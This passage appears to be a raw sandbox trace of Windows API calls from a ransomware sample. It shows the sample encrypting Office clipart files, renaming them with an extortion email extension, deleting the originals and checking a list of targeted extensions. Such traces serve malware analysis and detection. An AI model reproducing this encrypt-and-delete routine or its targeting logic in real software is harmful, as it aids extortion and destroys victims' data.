Office\\CLIPART\\PUB60COR\\IN00233_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf")) returned 1 [0273.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.287] lstrlenW (lpString=".doc") returned 4 [0273.287] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.287] lstrlenW (lpString=".docx") returned 5 [0273.287] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.287] lstrlenW (lpString=".pdf") returned 4 [0273.287] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.287] lstrlenW (lpString=".xls") returned 4 [0273.287] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.287] lstrlenW (lpString=".xlsx") returned 5 [0273.287] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.287] lstrlenW (lpString=".ppt") returned 4 [0273.287] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.287] lstrlenW (lpString=".zip") returned 4 [0273.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.287] lstrlenW (lpString=".rar") returned 4 [0273.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.287] lstrlenW (lpString=".bz2") returned 4 [0273.287] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.287] lstrlenW (lpString=".7z") returned 3 [0273.287] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.288] lstrlenW (lpString=".dbf") returned 4 [0273.288] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.288] lstrlenW (lpString=".1cd") returned 4 [0273.288] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned 63 [0273.288] lstrlenW (lpString=".jpg") returned 4 [0273.288] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.314] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1892) returned 1 [0273.314] CloseHandle (hObject=0x3b0) returned 1 [0273.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf")) returned 0x20 [0273.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.315] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.315] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.315] GetLastError () returned 0x0 [0273.315] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x764, lpOverlapped=0x0) returned 1 [0273.317] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x770, lpOverlapped=0x0) returned 1 [0273.318] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.318] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.318] SetEndOfFile (hFile=0x390) returned 1 [0273.318] CloseHandle (hObject=0x390) returned 1 [0273.318] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.318] SetEndOfFile (hFile=0x3b0) returned 1 [0273.320] CloseHandle (hObject=0x3b0) returned 1 [0273.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf")) returned 1 [0273.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.321] lstrlenW (lpString=".doc") returned 4 [0273.321] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.321] lstrlenW (lpString=".docx") returned 5 [0273.321] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.321] lstrlenW (lpString=".pdf") returned 4 [0273.321] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.321] lstrlenW (lpString=".xls") returned 4 [0273.321] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.321] lstrlenW (lpString=".xlsx") returned 5 [0273.321] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.321] lstrlenW (lpString=".ppt") returned 4 [0273.321] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.321] lstrlenW (lpString=".zip") returned 4 [0273.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.321] lstrlenW (lpString=".rar") returned 4 [0273.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.322] lstrlenW (lpString=".bz2") returned 4 [0273.322] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.322] lstrlenW (lpString=".7z") returned 3 [0273.322] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.322] lstrlenW (lpString=".dbf") returned 4 [0273.322] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.322] lstrlenW (lpString=".1cd") returned 4 [0273.322] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned 63 [0273.322] lstrlenW (lpString=".jpg") returned 4 [0273.322] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.324] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=12748) returned 1 [0273.324] CloseHandle (hObject=0x384) returned 1 [0273.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf")) returned 0x20 [0273.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.325] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.325] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.325] GetLastError () returned 0x0 [0273.325] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x31cc, lpOverlapped=0x0) returned 1 [0273.328] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x31d0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x31d0, lpOverlapped=0x0) returned 1 [0273.329] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.329] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.329] SetEndOfFile (hFile=0x3b0) returned 1 [0273.329] CloseHandle (hObject=0x3b0) returned 1 [0273.329] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.330] SetEndOfFile (hFile=0x384) returned 1 [0273.332] CloseHandle (hObject=0x384) returned 1 [0273.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00915_.wmf")) returned 1 [0273.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.332] lstrlenW (lpString=".doc") returned 4 [0273.332] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.332] lstrlenW (lpString=".docx") returned 5 [0273.332] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.332] lstrlenW (lpString=".pdf") returned 4 [0273.332] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString=".xls") returned 4 [0273.333] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.333] lstrlenW (lpString=".xlsx") returned 5 [0273.333] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.333] lstrlenW (lpString=".ppt") returned 4 [0273.333] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.333] lstrlenW (lpString=".zip") returned 4 [0273.333] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.333] lstrlenW (lpString=".rar") returned 4 [0273.333] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString=".bz2") returned 4 [0273.333] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString=".7z") returned 3 [0273.333] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.333] lstrlenW (lpString=".dbf") returned 4 [0273.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.333] lstrlenW (lpString=".1cd") returned 4 [0273.333] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00915_.WMF") returned 63 [0273.333] lstrlenW (lpString=".jpg") returned 4 [0273.333] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.334] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=6920) returned 1 [0273.334] CloseHandle (hObject=0x384) returned 1 [0273.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf")) returned 0x20 [0273.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.334] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.334] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.334] GetLastError () returned 0x0 [0273.334] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1b08, lpOverlapped=0x0) returned 1 [0273.337] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1b10, lpOverlapped=0x0) returned 1 [0273.338] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.338] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.338] SetEndOfFile (hFile=0x3b0) returned 1 [0273.338] CloseHandle (hObject=0x3b0) returned 1 [0273.338] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.338] SetEndOfFile (hFile=0x384) returned 1 [0273.340] CloseHandle (hObject=0x384) returned 1 [0273.340] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.340] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf")) returned 1 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.341] lstrlenW (lpString=".doc") returned 4 [0273.341] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString=".docx") returned 5 [0273.341] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.341] lstrlenW (lpString=".pdf") returned 4 [0273.341] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString=".xls") returned 4 [0273.341] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.341] lstrlenW (lpString=".xlsx") returned 5 [0273.341] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.341] lstrlenW (lpString=".ppt") returned 4 [0273.341] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.341] lstrlenW (lpString=".zip") returned 4 [0273.341] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.341] lstrlenW (lpString=".rar") returned 4 [0273.341] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString=".bz2") returned 4 [0273.341] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString=".7z") returned 3 [0273.341] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.341] lstrlenW (lpString=".dbf") returned 4 [0273.341] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.341] lstrlenW (lpString=".1cd") returned 4 [0273.341] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63 [0273.342] lstrlenW (lpString=".jpg") returned 4 [0273.342] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.342] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1256) returned 1 [0273.342] CloseHandle (hObject=0x384) returned 1 [0273.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf")) returned 0x20 [0273.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.342] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.342] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.343] GetLastError () returned 0x0 [0273.343] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x4e8, lpOverlapped=0x0) returned 1 [0273.625] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x4f0, lpOverlapped=0x0) returned 1 [0273.639] ReadFile (in: hFile=0x384, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.639] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.639] SetEndOfFile (hFile=0x3b0) returned 1 [0273.639] CloseHandle (hObject=0x3b0) returned 1 [0273.647] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.647] SetEndOfFile (hFile=0x384) returned 1 [0273.681] CloseHandle (hObject=0x384) returned 1 [0273.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf")) returned 1 [0273.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.681] lstrlenW (lpString=".doc") returned 4 [0273.681] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.681] lstrlenW (lpString=".docx") returned 5 [0273.681] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.681] lstrlenW (lpString=".pdf") returned 4 [0273.681] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.681] lstrlenW (lpString=".xls") returned 4 [0273.681] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.682] lstrlenW (lpString=".xlsx") returned 5 [0273.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.682] lstrlenW (lpString=".ppt") returned 4 [0273.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.682] lstrlenW (lpString=".zip") returned 4 [0273.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.682] lstrlenW (lpString=".rar") returned 4 [0273.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.682] lstrlenW (lpString=".bz2") returned 4 [0273.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.682] lstrlenW (lpString=".7z") returned 3 [0273.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.682] lstrlenW (lpString=".dbf") returned 4 [0273.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.682] lstrlenW (lpString=".1cd") returned 4 [0273.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned 63 [0273.682] lstrlenW (lpString=".jpg") returned 4 [0273.682] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.854] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=73214) returned 1 [0273.854] CloseHandle (hObject=0x37c) returned 1 [0273.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF" 